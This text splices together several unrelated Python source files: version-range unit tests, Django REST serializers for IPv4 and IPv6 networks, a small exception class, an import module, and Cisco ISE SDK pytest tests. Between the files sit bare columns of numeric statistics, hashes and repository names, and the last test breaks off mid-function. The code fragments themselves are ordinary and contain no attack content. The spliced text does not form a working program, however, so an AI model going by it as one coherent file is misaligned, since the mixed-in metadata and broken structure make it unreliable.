        self.assertTrue (vercmp.satisfies ("12.1.2-2-0", "[,12.1.2-2-0]"))
        self.assertTrue (vercmp.satisfies ("1.2.3-RELEASE", "[,1.2.3-RELEASE]"))
        self.assertTrue (vercmp.satisfies ("1.2", "(,1.3)"))
        self.assertTrue (vercmp.satisfies ("12.1.2-a-0", "(,12.1.2-a-1)"))
        self.assertFalse (vercmp.satisfies ("1.3", "(,1.2)"))
        self.assertTrue (vercmp.satisfies ("1.3", "(,1.4)"))
        self.assertFalse (vercmp.satisfies ("12.1.2-2-0", "(,12.1.2-2-0)"))
        self.assertFalse (vercmp.satisfies ("1.2.3-RELEASE", "(,1.2.3-RELEASE)"))

    def testSatisfiesMinimumExclusive (self):
        """'(x,)' ranges exclude the lower bound itself."""
        self.assertFalse (vercmp.satisfies ("1.2", "(1.3,)"))
        self.assertFalse (vercmp.satisfies ("12.1.2-a-0", "(12.1.2-a-1,)"))
        self.assertTrue (vercmp.satisfies ("1.2.4.2", "(1.2,)"))
        self.assertFalse (vercmp.satisfies ("1.2", "(1.2,)"))
        self.assertFalse (vercmp.satisfies ("12.1.2-2-0", "(12.1.2-2-0,)"))
        self.assertFalse (vercmp.satisfies ("1.2.3-RELEASE", "(1.2.3-RELEASE,)"))

    def testSatisfiesExact (self):
        """'[x]' matches exactly one version."""
        self.assertFalse (vercmp.satisfies ("1.2", "[1.3]"))
        self.assertFalse (vercmp.satisfies ("12.1.2-a-0", "[12.1.2-a-1]"))
        self.assertFalse (vercmp.satisfies ("1.3", "[1.2]"))
        self.assertTrue (vercmp.satisfies ("12.1.2-2-0", "[12.1.2-2-0]"))
        self.assertTrue (vercmp.satisfies ("1.2.3-RELEASE", "[1.2.3-RELEASE]"))

    def testSatisfiesRangeInclusive (self):
        """'[a,b]' includes both endpoints."""
        self.assertTrue (vercmp.satisfies ("1.1.4-asdf-23", "[1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertTrue (vercmp.satisfies ("1.1.4-asdf-42", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-22", "[1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-43", "[1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertTrue (vercmp.satisfies ("1.1.4-zzzz-22", "[1.1.4-asdf-23, 1.1.5-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-43", "[1.1.4-asdf-23, 1.1.5-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-23", "[1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdg-23", "[1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1", "[1.2,1.3]"))
        self.assertTrue (vercmp.satisfies ("1.2", "[1.2,1.3]"))
        self.assertTrue (vercmp.satisfies ("1.2.5", "[1.2,1.3]"))
        self.assertTrue (vercmp.satisfies ("1.3", "[1.2,1.3]"))
        self.assertFalse (vercmp.satisfies ("1.4", "[1.2,1.3]"))

    def testSatisfiesRangeExclusiveStart (self):
        """'(a,b]' excludes the lower endpoint only."""
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-23", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertTrue (vercmp.satisfies ("1.1.4-asdf-42", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-22", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-43", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertTrue (vercmp.satisfies ("1.1.4-zzzz-22", "(1.1.4-asdf-23, 1.1.5-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-43", "(1.1.4-asdf-23, 1.1.5-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-23", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdg-23", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
        self.assertFalse (vercmp.satisfies ("1.1", "(1.2,1.3]"))
        self.assertFalse (vercmp.satisfies ("1.2", "(1.2,1.3]"))
        self.assertTrue (vercmp.satisfies ("1.2.5", "(1.2,1.3]"))
        self.assertTrue (vercmp.satisfies ("1.3", "(1.2,1.3]"))
        self.assertFalse (vercmp.satisfies ("1.4", "(1.2,1.3]"))

    def testSatisfiesRangeExclusiveEnd (self):
        """'[a,b)' excludes the upper endpoint only."""
        self.assertTrue (vercmp.satisfies ("1.1.4-asdf-23", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-42", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-22", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-43", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertTrue (vercmp.satisfies ("1.1.4-zzzz-22", "[1.1.4-asdf-23, 1.1.5-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-43", "[1.1.4-asdf-23, 1.1.5-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-23", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdg-23", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1", "[1.2,1.3)"))
        self.assertTrue (vercmp.satisfies ("1.2", "[1.2,1.3)"))
        self.assertTrue (vercmp.satisfies ("1.2.5", "[1.2,1.3)"))
        self.assertFalse (vercmp.satisfies ("1.3", "[1.2,1.3)"))
        self.assertFalse (vercmp.satisfies ("1.4", "[1.2,1.3)"))

    def testSatisfiesRangeExclusive (self):
        """'(a,b)' excludes both endpoints."""
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-23", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-42", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-22", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdf-43", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertTrue (vercmp.satisfies ("1.1.4-zzzz-22", "(1.1.4-asdf-23, 1.1.5-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-43", "(1.1.4-asdf-23, 1.1.5-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-23", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1.4-asdg-23", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
        self.assertFalse (vercmp.satisfies ("1.1", "(1.2,1.3)"))
        self.assertFalse (vercmp.satisfies ("1.2", "(1.2,1.3)"))
        self.assertTrue (vercmp.satisfies ("1.2.0-something.0", "(1.2,1.3)"))
        self.assertTrue (vercmp.satisfies ("1.2.5", "(1.2,1.3)"))
        self.assertFalse (vercmp.satisfies ("1.3", "(1.2,1.3)"))
        self.assertFalse (vercmp.satisfies ("1.4", "(1.2,1.3)"))

    def testSatisfiesMultipleRanges (self):
        """Comma-separated ranges form a union: a match in any range satisfies."""
        self.assertTrue (vercmp.satisfies ("0.3", "(,1.0],[1.2,)"))
        self.assertTrue (vercmp.satisfies ("1.0", "(,1.0],[1.2,)"))
        self.assertFalse (vercmp.satisfies ("1.1", "(,1.0],[1.2,)"))
        self.assertTrue (vercmp.satisfies ("1.2", "(,1.0],[1.2,)"))
        self.assertTrue (vercmp.satisfies ("8.2", "(,1.0],[1.2,)"))
        self.assertTrue (vercmp.satisfies ("0.3", "(,1.0),(1.2,)"))
        self.assertFalse (vercmp.satisfies ("1.0", "(,1.0),(1.2,)"))
        self.assertFalse (vercmp.satisfies ("1.1", "(,1.0),(1.2,)"))
        self.assertFalse (vercmp.satisfies ("1.2", "(,1.0),(1.2,)"))
        self.assertTrue (vercmp.satisfies ("8.2", "(,1.0),(1.2,)"))

    def testSatisfiesWithSpaces (self):
        """Whitespace inside a range specification is ignored."""
        self.assertTrue (vercmp.satisfies ("1.2", " ( , 1.3 ] "))
        self.assertTrue (vercmp.satisfies ("1.3", "( ,1.3]"))
        self.assertFalse (vercmp.satisfies ("1.4", "( , 1.3]"))
        self.assertTrue (vercmp.satisfies ("1.2", "( , 1.3.5]"))
if __name__ == '__main__':
unittest.main()
| 46.951965
| 91
| 0.607701
| 1,734
| 10,752
| 3.761246
| 0.044406
| 0.034039
| 0.218338
| 0.077277
| 0.878718
| 0.869365
| 0.869212
| 0.849586
| 0.839466
| 0.797761
| 0
| 0.117782
| 0.146391
| 10,752
| 228
| 92
| 47.157895
| 0.592831
| 0.004278
| 0
| 0.209945
| 0
| 0.176796
| 0.251892
| 0.001962
| 0
| 0
| 0
| 0
| 0.79558
| 1
| 0.066298
| false
| 0
| 0.022099
| 0
| 0.160221
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0af34a62968ff2d125ed8c224de38552409607bd
| 10,215
|
py
|
Python
|
networkapi/api_network/serializers/v3.py
|
vinicius-marinho/GloboNetworkAPI
|
94651d3b4dd180769bc40ec966814f3427ccfb5b
|
[
"Apache-2.0"
] | 73
|
2015-04-13T17:56:11.000Z
|
2022-03-24T06:13:07.000Z
|
networkapi/api_network/serializers/v3.py
|
leopoldomauricio/GloboNetworkAPI
|
3b5b2e336d9eb53b2c113977bfe466b23a50aa29
|
[
"Apache-2.0"
] | 99
|
2015-04-03T01:04:46.000Z
|
2021-10-03T23:24:48.000Z
|
networkapi/api_network/serializers/v3.py
|
shildenbrand/GloboNetworkAPI
|
515d5e961456cee657c08c275faa1b69b7452719
|
[
"Apache-2.0"
] | 64
|
2015-08-05T21:26:29.000Z
|
2022-03-22T01:06:28.000Z
|
# -*- coding: utf-8 -*-
import logging
from django.db.models import get_model
from rest_framework import serializers
from networkapi.util.geral import get_app
from networkapi.util.serializers import DynamicFieldsModelSerializer
log = logging.getLogger(__name__)
class NetworkTypeV3Serializer(DynamicFieldsModelSerializer):
    """Serializes the TipoRede (network type) model for the v3 API."""

    # Expose the legacy 'tipo_rede' attribute under its v3 name.
    network_type = serializers.Field(source='tipo_rede')

    class Meta:
        # Resolve the model lazily via get_model to avoid import-time
        # circular dependencies between apps.
        TipoRede = get_model('vlan', 'TipoRede')
        model = TipoRede
        fields = (
            'id',
            'tipo_rede',
        )
class NetworkIPv4V3Serializer(DynamicFieldsModelSerializer):
    """Serializes the NetworkIPv4 model for the v3 API.

    Related objects (environment vip, vlan, network type) are rendered
    through ``extends_serializer``: depending on the requested kind
    (plain / ``__basic`` / ``__details``) either the raw FK id or the
    output of a nested serializer is returned, per the mapping built in
    :meth:`get_serializers`.
    """

    # Read-only fields renamed/computed from model attributes.
    prefix = serializers.Field(source='block')
    networkv4 = serializers.Field(source='networkv4')
    # NOTE: the 'formated' spelling is part of the public API; keep as-is.
    mask_formated = serializers.Field(source='mask_formated')
    dhcprelay = serializers.Field(source='dhcprelay')

    # Relations dispatched through the get_* methods below.
    environmentvip = serializers.SerializerMethodField('get_environmentvip')
    vlan = serializers.SerializerMethodField('get_vlan')
    network_type = serializers.SerializerMethodField('get_network_type')

    def get_environmentvip(self, obj):
        # Delegate to the kind-aware dispatch (raw id vs nested serializer).
        return self.extends_serializer(obj, 'environmentvip')

    def get_vlan(self, obj):
        return self.extends_serializer(obj, 'vlan')

    def get_network_type(self, obj):
        return self.extends_serializer(obj, 'network_type')

    def get_serializers(self):
        """Returns the mapping of serializers.

        Builds ``self.mapping`` on first use; each entry names the model
        attribute to read ('obj'), and optionally a nested serializer,
        its kwargs and an eager-loading hook for the queryset.
        """
        # NOTE(review): these app lookups run on every call, even when
        # self.mapping is already populated — only the assignment is guarded.
        envvip_slz = get_app('api_environment_vip', module_label='serializers')
        vlan_slz = get_app('api_vlan', module_label='serializers')
        if not self.mapping:
            self.mapping = {
                'environmentvip': {
                    'obj': 'ambient_vip_id'
                },
                'environmentvip__details': {
                    'serializer': envvip_slz.EnvironmentVipV3Serializer,
                    'kwargs': {
                    },
                    'obj': 'ambient_vip',
                    'eager_loading': self.setup_eager_loading_envvip
                },
                'vlan': {
                    'obj': 'vlan_id'
                },
                'vlan__basic': {
                    'serializer': vlan_slz.VlanV3Serializer,
                    'kwargs': {
                        'kind': 'basic'
                    },
                    'obj': 'vlan',
                    'eager_loading': self.setup_eager_loading_vlan
                },
                'vlan__details': {
                    'serializer': vlan_slz.VlanV3Serializer,
                    'kwargs': {
                    },
                    'obj': 'vlan',
                    'eager_loading': self.setup_eager_loading_vlan
                },
                'network_type': {
                    'obj': 'network_type_id'
                },
                'network_type__details': {
                    'serializer': NetworkTypeV3Serializer,
                    'kwargs': {
                    },
                    'obj': 'network_type',
                    'eager_loading': self.setup_eager_loading_net_type
                },
            }

    @staticmethod
    def setup_eager_loading_net_type(queryset):
        """Eager loading of network type for related NetworkIPv4."""
        log.info('Using setup_eager_loading_net_type')
        queryset = queryset.select_related(
            'network_type',
        )
        return queryset

    @staticmethod
    def setup_eager_loading_vlan(queryset):
        """Eager loading of vlan for related NetworkIPv4."""
        log.info('Using setup_eager_loading_vlan')
        queryset = queryset.select_related(
            'vlan',
        )
        return queryset

    @staticmethod
    def setup_eager_loading_envvip(queryset):
        """Eager loading of environment vip for related NetworkIPv4."""
        log.info('Using setup_eager_loading_envvip')
        queryset = queryset.select_related(
            'ambient_vip',
        )
        return queryset

    class Meta:
        # Lazy model resolution avoids circular imports.
        NetworkIPv4 = get_model('ip', 'NetworkIPv4')
        model = NetworkIPv4

        # Fields rendered when no explicit kind is requested.
        default_fields = (
            'id',
            'oct1',
            'oct2',
            'oct3',
            'oct4',
            'prefix',
            'mask_oct1',
            'mask_oct2',
            'mask_oct3',
            'mask_oct4',
            'broadcast',
            'vlan',
            'network_type',
            'environmentvip',
            'active',
            'cluster_unit',
        )

        # Superset of all serializable fields.
        fields = (
            'id',
            'oct1',
            'oct2',
            'oct3',
            'oct4',
            'prefix',
            'networkv4',
            'mask_oct1',
            'mask_oct2',
            'mask_oct3',
            'mask_oct4',
            'mask_formated',
            'broadcast',
            'vlan',
            'network_type',
            'environmentvip',
            'active',
            'dhcprelay',
            'cluster_unit',
        )

        # Compact rendering for kind='basic'.
        basic_fields = (
            'id',
            'networkv4',
            'mask_formated',
            'broadcast',
            'vlan',
            'network_type',
            'environmentvip',
        )

        # kind='details' renders everything.
        details_fields = fields
class NetworkIPv6V3Serializer(DynamicFieldsModelSerializer):
    """Serializes the NetworkIPv6 model for the v3 API.

    Structure mirrors NetworkIPv4V3Serializer: related objects are
    rendered through ``extends_serializer`` using the mapping built in
    :meth:`get_serializers`.
    """

    # Read-only fields renamed/computed from model attributes.
    prefix = serializers.Field(source='block')
    networkv6 = serializers.Field(source='networkv6')
    # NOTE: the 'formated' spelling is part of the public API; keep as-is.
    mask_formated = serializers.Field(source='mask_formated')
    dhcprelay = serializers.Field(source='dhcprelay')

    # Relations dispatched through the get_* methods below.
    environmentvip = serializers.SerializerMethodField('get_environmentvip')
    vlan = serializers.SerializerMethodField('get_vlan')
    network_type = serializers.SerializerMethodField('get_network_type')

    def get_environmentvip(self, obj):
        # Delegate to the kind-aware dispatch (raw id vs nested serializer).
        return self.extends_serializer(obj, 'environmentvip')

    def get_vlan(self, obj):
        return self.extends_serializer(obj, 'vlan')

    def get_network_type(self, obj):
        return self.extends_serializer(obj, 'network_type')

    def get_serializers(self):
        """Returns the mapping of serializers.

        Builds ``self.mapping`` on first use; see
        NetworkIPv4V3Serializer.get_serializers for the entry layout.
        """
        # NOTE(review): these app lookups run on every call, even when
        # self.mapping is already populated — only the assignment is guarded.
        envvip_slz = get_app('api_environment_vip', module_label='serializers')
        vlan_slz = get_app('api_vlan', module_label='serializers')
        if not self.mapping:
            self.mapping = {
                'environmentvip': {
                    'obj': 'ambient_vip_id'
                },
                'environmentvip__details': {
                    'serializer': envvip_slz.EnvironmentVipV3Serializer,
                    'kwargs': {
                    },
                    'obj': 'ambient_vip',
                    'eager_loading': self.setup_eager_loading_envvip
                },
                'vlan': {
                    'obj': 'vlan_id'
                },
                'vlan__basic': {
                    'serializer': vlan_slz.VlanV3Serializer,
                    'kwargs': {
                        'kind': 'basic'
                    },
                    'obj': 'vlan',
                    'eager_loading': self.setup_eager_loading_vlan
                },
                'vlan__details': {
                    'serializer': vlan_slz.VlanV3Serializer,
                    'kwargs': {
                    },
                    'obj': 'vlan',
                    'eager_loading': self.setup_eager_loading_vlan
                },
                'network_type': {
                    'obj': 'network_type_id'
                },
                'network_type__details': {
                    'serializer': NetworkTypeV3Serializer,
                    'kwargs': {
                    },
                    'obj': 'network_type',
                    'eager_loading': self.setup_eager_loading_net_type
                },
            }

    @staticmethod
    def setup_eager_loading_net_type(queryset):
        """Eager loading of network type for related NetworkIPv6."""
        log.info('Using setup_eager_loading_net_type')
        queryset = queryset.select_related(
            'network_type',
        )
        return queryset

    @staticmethod
    def setup_eager_loading_vlan(queryset):
        """Eager loading of vlan for related NetworkIPv6."""
        log.info('Using setup_eager_loading_vlan')
        queryset = queryset.select_related(
            'vlan',
        )
        return queryset

    @staticmethod
    def setup_eager_loading_envvip(queryset):
        """Eager loading of environment vip for related NetworkIPv6."""
        log.info('Using setup_eager_loading_envvip')
        queryset = queryset.select_related(
            'ambient_vip',
        )
        return queryset

    class Meta:
        # Lazy model resolution avoids circular imports.
        NetworkIPv6 = get_model('ip', 'NetworkIPv6')
        model = NetworkIPv6

        # Fields rendered when no explicit kind is requested.
        default_fields = (
            'id',
            'block1',
            'block2',
            'block3',
            'block4',
            'block5',
            'block6',
            'block7',
            'block8',
            'prefix',
            'mask1',
            'mask2',
            'mask3',
            'mask4',
            'mask5',
            'mask6',
            'mask7',
            'mask8',
            'vlan',
            'network_type',
            'environmentvip',
            'active',
            'cluster_unit',
        )

        # Superset of all serializable fields.
        fields = (
            'id',
            'block1',
            'block2',
            'block3',
            'block4',
            'block5',
            'block6',
            'block7',
            'block8',
            'prefix',
            'networkv6',
            'mask1',
            'mask2',
            'mask3',
            'mask4',
            'mask5',
            'mask6',
            'mask7',
            'mask8',
            'mask_formated',
            'vlan',
            'network_type',
            'environmentvip',
            'active',
            'dhcprelay',
            'cluster_unit',
        )

        # Compact rendering for kind='basic'.
        basic_fields = (
            'id',
            'networkv6',
            'mask_formated',
            # NOTE(review): 'broadcast' is not declared in 'fields' above and
            # IPv6 networks have no broadcast address — this looks copied from
            # the IPv4 serializer. Confirm against the model before relying on
            # the 'basic' kind.
            'broadcast',
            'vlan',
            'network_type',
            'environmentvip',
        )

        # kind='details' renders everything.
        details_fields = fields
| 29.269341
| 79
| 0.499853
| 792
| 10,215
| 6.175505
| 0.141414
| 0.083419
| 0.069515
| 0.034349
| 0.839501
| 0.839501
| 0.822122
| 0.807197
| 0.777755
| 0.757309
| 0
| 0.01363
| 0.396672
| 10,215
| 348
| 80
| 29.353448
| 0.779977
| 0.050318
| 0
| 0.80756
| 0
| 0
| 0.202177
| 0.025298
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04811
| false
| 0
| 0.017182
| 0.020619
| 0.178694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c272cc88eed5fd42ac3a95cae59c0b902b6c645
| 43
|
py
|
Python
|
src/viggy_3d/GLTFImporter/errors.py
|
vigneshpai2003/Viggy
|
55925ea63daef6d44ebee7675e26b430aaea4825
|
[
"MIT"
] | 2
|
2021-12-30T15:19:43.000Z
|
2022-01-16T14:50:51.000Z
|
src/viggy_3d/GLTFImporter/errors.py
|
vigneshpai2003/Viggy
|
55925ea63daef6d44ebee7675e26b430aaea4825
|
[
"MIT"
] | 1
|
2022-02-04T21:30:23.000Z
|
2022-02-05T20:22:05.000Z
|
src/viggy_3d/GLTFImporter/errors.py
|
vigneshpai2003/viggy-3d
|
62ac2e48b38532c0f22f236d9f94d983bef7a28e
|
[
"MIT"
] | null | null | null |
class GLTFImportError(Exception):
    """Raised when a glTF asset cannot be imported."""
| 14.333333
| 33
| 0.767442
| 4
| 43
| 8.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 43
| 2
| 34
| 21.5
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
7c2e5e89b8e567f8e0c3fd613fdccb814ae82621
| 140
|
py
|
Python
|
calculate_anything/currency/__init__.py
|
friday/ulauncher-albert-calculate-anything
|
65e34ded08a4d88a66ec9fcd29bec41e57b32967
|
[
"MIT"
] | null | null | null |
calculate_anything/currency/__init__.py
|
friday/ulauncher-albert-calculate-anything
|
65e34ded08a4d88a66ec9fcd29bec41e57b32967
|
[
"MIT"
] | null | null | null |
calculate_anything/currency/__init__.py
|
friday/ulauncher-albert-calculate-anything
|
65e34ded08a4d88a66ec9fcd29bec41e57b32967
|
[
"MIT"
] | null | null | null |
from calculate_anything.currency.cache import CurrencyCache, CacheException
from calculate_anything.currency.service import CurrencyService
| 46.666667
| 75
| 0.9
| 15
| 140
| 8.266667
| 0.666667
| 0.209677
| 0.33871
| 0.467742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064286
| 140
| 2
| 76
| 70
| 0.946565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
7c2f781344795159dc5c3fd31d961009e1b992c4
| 11,805
|
py
|
Python
|
tests/api/v3_0_0/test_device_administration_policy_set.py
|
oianson/ciscoisesdk
|
c8fe9d80416048dd0ff2241209c4f78ab78c1a4a
|
[
"MIT"
] | null | null | null |
tests/api/v3_0_0/test_device_administration_policy_set.py
|
oianson/ciscoisesdk
|
c8fe9d80416048dd0ff2241209c4f78ab78c1a4a
|
[
"MIT"
] | null | null | null |
tests/api/v3_0_0/test_device_administration_policy_set.py
|
oianson/ciscoisesdk
|
c8fe9d80416048dd0ff2241209c4f78ab78c1a4a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""IdentityServicesEngineAPI device_administration_policy_set API fixtures and tests.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import pytest
from fastjsonschema.exceptions import JsonSchemaException
from ciscoisesdk.exceptions import MalformedRequest
from tests.environment import IDENTITY_SERVICES_ENGINE_VERSION
pytestmark = pytest.mark.skipif(IDENTITY_SERVICES_ENGINE_VERSION != '3.0.0', reason='version does not match')
def is_valid_get_all_device_admin_policy_sets(json_schema_validate, obj):
    """Check that *obj* is a requests-style response matching the JSON schema."""
    if not obj:
        return False
    # The response wrapper must expose the usual REST-response attributes.
    for attr in ('headers', 'content', 'text', 'response'):
        assert hasattr(obj, attr)
    json_schema_validate('jsd_fe54c96ccba65af1abe3cd08f4fc69cb_v3_0_0').validate(obj.response)
    return True
def get_all_device_admin_policy_sets(api):
    """Invoke the 'get all device admin policy sets' endpoint and return its result."""
    service = api.device_administration_policy_set
    return service.get_all_device_admin_policy_sets()
@pytest.mark.device_administration_policy_set
def test_get_all_device_admin_policy_sets(api, validator):
    """Response from the live endpoint must validate against its JSON schema."""
    try:
        response = get_all_device_admin_policy_sets(api)
        assert is_valid_get_all_device_admin_policy_sets(validator, response)
    except Exception as err:
        # Failures are acceptable only as schema or malformed-request errors.
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(err)
            raise err
def get_all_device_admin_policy_sets_default(api):
    """Same endpoint call, exercised with only default arguments."""
    service = api.device_administration_policy_set
    return service.get_all_device_admin_policy_sets()
@pytest.mark.device_administration_policy_set
def test_get_all_device_admin_policy_sets_default(api, validator):
    """Default-argument call must validate or fail with a known error type."""
    try:
        response = get_all_device_admin_policy_sets_default(api)
        assert is_valid_get_all_device_admin_policy_sets(validator, response)
    except Exception as err:
        # TypeError is tolerated here: defaults may omit required arguments.
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise err
def is_valid_create_device_admin_policy_set(json_schema_validate, obj):
    """Check that *obj* is a requests-style response matching the JSON schema."""
    if not obj:
        return False
    # The response wrapper must expose the usual REST-response attributes.
    for attr in ('headers', 'content', 'text', 'response'):
        assert hasattr(obj, attr)
    json_schema_validate('jsd_cc909c2717cf55f1863a04a785166fe0_v3_0_0').validate(obj.response)
    return True
def create_device_admin_policy_set(api):
    """Exercise the create endpoint with a fully populated sample payload."""
    # active_validation is off because the payload uses placeholder values.
    return api.device_administration_policy_set.create_device_admin_policy_set(
        active_validation=False,
        condition={'conditionType': 'string', 'isNegate': True, 'name': 'string', 'id': 'string', 'description': 'string', 'dictionaryName': 'string', 'attributeName': 'string', 'attributeId': 'string', 'operator': 'string', 'dictionaryValue': 'string', 'attributeValue': 'string', 'children': [{'conditionType': 'string', 'isNegate': True}], 'hoursRange': {'startTime': 'string', 'endTime': 'string'}, 'hoursRangeException': {'startTime': 'string', 'endTime': 'string'}, 'weekDays': ['string'], 'weekDaysException': ['string'], 'datesRange': {'startDate': 'string', 'endDate': 'string'}, 'datesRangeException': {'startDate': 'string', 'endDate': 'string'}},
        default=True,
        description='string',
        hit_counts=0,
        id='string',
        is_proxy=True,
        name='string',
        payload=None,
        rank=0,
        service_name='string',
        state='string'
    )
@pytest.mark.device_administration_policy_set
def test_create_device_admin_policy_set(api, validator):
    """Creating with the sample payload must yield a schema-valid response."""
    try:
        response = create_device_admin_policy_set(api)
        assert is_valid_create_device_admin_policy_set(validator, response)
    except Exception as err:
        # Failures are acceptable only as schema or malformed-request errors.
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(err)
            raise err
def create_device_admin_policy_set_default(api):
    """Exercise the create endpoint with every optional argument left as None."""
    return api.device_administration_policy_set.create_device_admin_policy_set(
        active_validation=False,
        condition=None,
        default=None,
        description=None,
        hit_counts=None,
        id=None,
        is_proxy=None,
        name=None,
        payload=None,
        rank=None,
        service_name=None,
        state=None
    )
@pytest.mark.device_administration_policy_set
def test_create_device_admin_policy_set_default(api, validator):
    """Default-argument create must validate or fail with a known error type."""
    try:
        response = create_device_admin_policy_set_default(api)
        assert is_valid_create_device_admin_policy_set(validator, response)
    except Exception as err:
        # TypeError is tolerated here: defaults may omit required arguments.
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise err
def is_valid_get_device_admin_policy_set_by_id(json_schema_validate, obj):
    """Check that *obj* is a requests-style response matching the JSON schema."""
    if not obj:
        return False
    # The response wrapper must expose the usual REST-response attributes.
    for attr in ('headers', 'content', 'text', 'response'):
        assert hasattr(obj, attr)
    json_schema_validate('jsd_440b1da14ba95aa48b498c76d0bc1017_v3_0_0').validate(obj.response)
    return True
def get_device_admin_policy_set_by_id(api):
    """Fetch a single policy set using the placeholder id 'string'."""
    service = api.device_administration_policy_set
    return service.get_device_admin_policy_set_by_id(id='string')
@pytest.mark.device_administration_policy_set
def test_get_device_admin_policy_set_by_id(api, validator):
    """Fetching by id must yield a schema-valid response."""
    try:
